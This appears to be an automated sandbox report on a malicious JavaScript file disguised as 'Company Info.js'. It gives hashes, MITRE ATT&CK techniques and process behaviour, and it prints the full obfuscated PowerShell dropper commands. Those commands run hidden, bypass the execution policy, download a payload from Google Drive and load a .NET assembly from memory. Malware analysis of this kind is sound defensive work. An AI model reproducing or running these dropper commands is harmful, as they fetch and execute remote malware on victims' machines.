397c1cb5536c84ebaf2ab511cf4183be4364ed6619c0bfaf2ac816a99ec49a4a

General

Target

Collaboration Request/Company Info.js
Size

15KB
MD5

03cf8621c289fbd13ebf3f14837da3d1
SHA1

61239e9eeb422eb59306f354546fcd8317a2ce69
SHA256

4d8fd3bbbcf0f1ab58cbef0b189ed1e3abbf6ff523c0b478f80fffc2aa36ba53
SHA512

c1a3483d30f211bd5d17feaa7081c8e75353cf3b556b4bbb86c611b553db8a580c24bcb52c8c0a8c15df20100da4b91aa6e99563466789eee7dedbe1a1513d8a
SSDEEP

384:zkICeaCPI9hUmMLVmdZyukUQqhHdHviwDv:QICjC6hDYmdZKUQqh9PiwDv

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2872	wscript.exe
4	2872	wscript.exe
6	2772	powershell.exe
8	2772	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2836	powershell.exe
2772	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
6	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2836	powershell.exe
2772	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2772	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2872 wrote to memory of 2836	2872	wscript.exe	30
PID 2872 wrote to memory of 2836	2872	wscript.exe	30
PID 2872 wrote to memory of 2836	2872	wscript.exe	30
PID 2836 wrote to memory of 2772	2836	powershell.exe	32
PID 2836 wrote to memory of 2772	2836	powershell.exe	32
PID 2836 wrote to memory of 2772	2836	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Collaboration Request\Company Info.js"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABzAEgAZQBsAEwAaQBEAFsAMQBdACsAJABTAEgARQBMAEwAaQBEAFsAMQAzAF0AKwAnAHgAJwApACgAKAAnADUAbgB2AGkAbQBhAGcAZQBVAHIAbAAgAD0AIABBAFcAcABoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAQQBXAHAAOwA1AG4AdgB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsANQBuAHYAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AJwArACcAIAA1AG4AdgB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3ACcAKwAnAG4AbABvAGEAZABEAGEAdABhACgANQBuAHYAaQBtAGEAZwBlAFUAcgBsACkAOwA1AG4AdgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4AJwArACcARwBlAHQAUwB0AHIAaQBuAGcAKAA1AG4AdgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwA1AG4AdgBzAHQAYQByAHQARgBsAGEAZwAgAD0AJwArACcAIABBAFcAcAA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+AEEAVwBwADsAJwArACcANQBuAHYAZQBuAGQARgBsAGEAZwAgAD0AIABBAFcAcAA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AQQBXAHAAOwA1AG4AdgBzAHQAYQByAHQASQBuAGQAZQB4ACcAKwAnACAAPQAgADUAbgB2AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoADUAbgB2AHMAdABhAHIAdABGAGwAYQBnACkAOwA1AG4AdgBlAG4AZABJAG4AZABlAHgAJwArACcAIAA9ACAANQBuAHYAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwAnACsAJwBmACcAKwAnACgANQBuAHYAZQBuAGQARgBsAGEAZwApADsANQBuAHYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAA1AG4AdgBlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgADUAbgAnACsAJwB2AHMAdABhAHIAdABJAG4AZABlAHgAOwA1AG4AdgBzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAANQBuAHYAcwB0AGEAJwArACcAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACcAKwAnADUAbgB2AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgADUAbgB2AGUAbgBkAEkAbgBkAGUAeAAgAC0AIAA1AG4AdgBzAHQAYQByAHQASQBuAGQAZQB4ADsANQBuAHYAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAA1ACcAKwAnAG4AdgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgANQBuAHYAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAANQBuAHYAYgBhAHMAJwArACcAZQA2ADQATABlAG4AZwB0AGgAKQA7ADUAbgB2AGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoADUAbgB2AGIAYQBzAGUANgA0AEMAbwBtACcAKwAnAG0AYQBuAGQALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAARwBSAGMAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAANQBuACcAKwAnAHYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoADUAbgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApAF0AOwA1AG4AdgAnACsAJwBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbACcAKwAnAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgANQBuAHYAYgBhAHMAZQA2ADQAUgBlAHYAZQByACcAKwAnAHMAZQBkACkAOwA1AG4AdgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoADUAbgB2AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwA1AG4AdgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAQQBXAHAAVgBBACcAKwAnAEkAQQBXAHAAKQA7ADUAbgB2AHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAA1AG4AdgBuAHUAbABsACwAIABAACgAQQBXAHAAdAB4AHQALgAyAGkAcgBvAC8AdgB3AGUAbgAvAHIAYgAuAG0AbwBjAC4ANQAwADEAcgBlAC4AbwBtAGwALwAvADoAcwBwAHQAdABoAEEAVwBwACwAIABBAFcAJwArACcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAIABBAFcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAIABBAFcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAIABBAFcAcABDAGEAcwBQAG8AbABBAFcAcAAsACAAQQBXAHAAZABlAHMAJwArACcAYQB0AGkAdgBhAGQAbwBBAFcAcAAsAEEAVwBwAGQAZQBzAGEAdABpAHYAYQBkAG8AQQBXAHAALABBAFcAcABkAGUAcwBhAHQAaQB2AGEAZABvAEEAVwBwACwAQQBXAHAAVQBSAEwAQQBXAHAALAAgACcAKwAnAEEAVwBwAEMAOgB0AFUAWQBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAdABVAFkAQQBXAHAAJwArACcALABBAFcAcABkAGEAYwB0AGkAbABvAG0AYQBuAGMAaQBhAEEAVwAnACsAJwBwACwAQQBXAHAAagBzAEEAVwBwACwAQQBXAHAAMQBBAFcAcAAsAEEAVwBwADEAQQBXAHAAKQApADsAJwApAC4AcgBFAHAATABBAGMAZQAoACgAWwBDAEgAYQBSAF0AMQAxADYAKwBbAEMASABhAFIAXQA4ADUAKwBbAEMASABhAFIAXQA4ADkAKQAsACcAXAAnACkALgByAEUAcABMAEEAYwBlACgAKABbAEMASABhAFIAXQA3ADEAKwBbAEMASABhAFIAXQA4ADIAKwBbAEMASABhAFIAXQA5ADkAKQAsAFsAcwBUAFIAaQBOAEcAXQBbAEMASABhAFIAXQAxADIANAApAC4AcgBFAHAATABBAGMAZQAoACgAWwBDAEgAYQBSAF0ANQAzACsAWwBDAEgAYQBSAF0AMQAxADAAKwBbAEMASABhAFIAXQAxADEAOAApACwAWwBzAFQAUgBpAE4ARwBdAFsAQwBIAGEAUgBdADMANgApAC4AcgBFAHAATABBAGMAZQAoACgAWwBDAEgAYQBSAF0ANgA1ACsAWwBDAEgAYQBSAF0AOAA3ACsAWwBDAEgAYQBSAF0AMQAxADIAKQAsAFsAcwBUAFIAaQBOAEcAXQBbAEMASABhAFIAXQAzADkAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHelLiD[1]+$SHELLiD[13]+'x')(('5nvimageUrl = AWphttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwurAWp;5nvwebClient = New-Object System.Net.WebClient;5nvimageBytes ='+' 5nvwebClient.Dow'+'nloadData(5nvimageUrl);5nvimageText = [System.Text.Encoding]::UTF8.'+'GetString(5nvimageBytes);5nvstartFlag ='+' AWp<<BASE64_START>>AWp;'+'5nvendFlag = AWp<<BASE64_END>>AWp;5nvstartIndex'+' = 5nvimageText.IndexOf(5nvstartFlag);5nvendIndex'+' = 5nvimageText.IndexO'+'f'+'(5nvendFlag);5nvstartIndex -ge 0 -and 5nvendIndex -gt 5n'+'vstartIndex;5nvstartIndex += 5nvsta'+'rtFlag.Length;'+'5nvbase64Length = 5nvendIndex - 5nvstartIndex;5nvbase64Command = 5'+'nvimageText.Substring(5nvstartIndex, 5nvbas'+'e64Length);5nvbase64Reversed = -join (5nvbase64Com'+'mand.ToCharArray() GRc ForEach-Object { 5n'+'v_ })[-1..-(5nvbase64Command.Length)];5nv'+'commandBytes = ['+'System.Convert]::FromBase64String(5nvbase64Rever'+'sed);5nvloadedAssembly = [System.Reflection.Assembly]::Load(5nvcommandBytes);5nvvaiMethod = [dnlib.IO.Home].GetMethod(AWpVA'+'IAWp);5nvvaiMethod.Invoke(5nvnull, @(AWptxt.2iro/vwen/rb.moc.501re.oml//:sptthAWp, AW'+'pdesativadoAWp, AWpdesativadoAWp, AWpdesativadoAWp, AWpCasPolAWp, AWpdes'+'ativadoAWp,AWpdesativadoAWp,AWpdesativadoAWp,AWpURLAWp, '+'AWpC:tUYProgramDatatUYAWp'+',AWpdactilomanciaAW'+'p,AWpjsAWp,AWp1AWp,AWp1AWp));').rEpLAce(([CHaR]116+[CHaR]85+[CHaR]89),'\').rEpLAce(([CHaR]71+[CHaR]82+[CHaR]99),[sTRiNG][CHaR]124).rEpLAce(([CHaR]53+[CHaR]110+[CHaR]118),[sTRiNG][CHaR]36).rEpLAce(([CHaR]65+[CHaR]87+[CHaR]112),[sTRiNG][CHaR]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3d347dd6d17d23c6814b2bff7a9bf5c5

SHA1
db1d3feda24bb3009e511016265da502ec436705

SHA256
c3242177685d0f1ab97cc12e4dba94d09e38b79a5373eaa670fe213ffe4c89fb

SHA512
41486d0eaf096ab16726f333a0d6f3c07afe5c9791ccce850ef6d1c7f22b3d55dd7af8fce54598faf3adcd79a227a0c73b8c3b2c0aec5509c2f94331b706c328

Download Submit
memory/2836-4-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp

Filesize
4KB

Download
memory/2836-6-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

Filesize
2.9MB

Download
memory/2836-5-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-7-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/2836-8-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-9-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-10-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-11-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download
memory/2836-17-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing